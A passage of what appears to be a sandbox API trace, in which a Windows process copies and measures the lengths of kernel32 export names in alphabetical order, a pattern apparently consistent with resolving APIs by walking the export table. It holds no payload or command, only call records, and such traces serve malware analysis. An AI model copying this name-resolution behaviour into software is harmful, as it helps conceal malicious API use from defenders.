returned="BasepAnsiStringToDynamicUnicodeString" [0085.404] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.404] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.404] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.404] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.404] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.404] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.404] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.404] lstrlenA (lpString="BEEP") returned 4 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.404] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.404] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.404] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.404] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.404] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.404] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.404] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.405] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.405] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.405] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.405] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.405] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.405] lstrlenA (lpString="CANCELIO") returned 8 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.405] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.405] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.405] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.405] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.405] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.405] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.405] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.405] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.405] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.405] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.405] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.405] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.405] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.406] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.406] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.406] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.406] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.406] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.406] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.406] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.406] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.406] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.406] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.406] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.406] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.406] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.406] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.406] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.410] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.410] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.410] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.410] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.410] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.410] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.410] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.410] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.410] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.410] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.410] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.411] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.411] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.411] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.411] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.411] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.411] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.411] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.411] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.411] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.411] lstrlenA (lpString="COPYFILEA") returned 9 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.411] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.411] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.411] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.411] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.411] lstrlenA (lpString="COPYFILEW") returned 9 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.411] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.411] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.411] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.411] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.412] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.412] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.412] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.412] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.412] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.412] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.412] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.412] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.412] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.412] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.412] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.412] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.412] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.412] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.412] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.412] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.412] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.412] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.412] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.413] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.413] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.413] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.413] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.413] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.413] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.413] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.413] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.413] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.413] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.413] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.413] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.413] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.413] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.413] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.413] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.413] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.413] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.413] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.414] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.414] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.414] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.414] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.414] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.414] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.414] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.414] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.414] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.414] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.414] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.414] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.414] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.414] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.414] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.414] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.414] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" 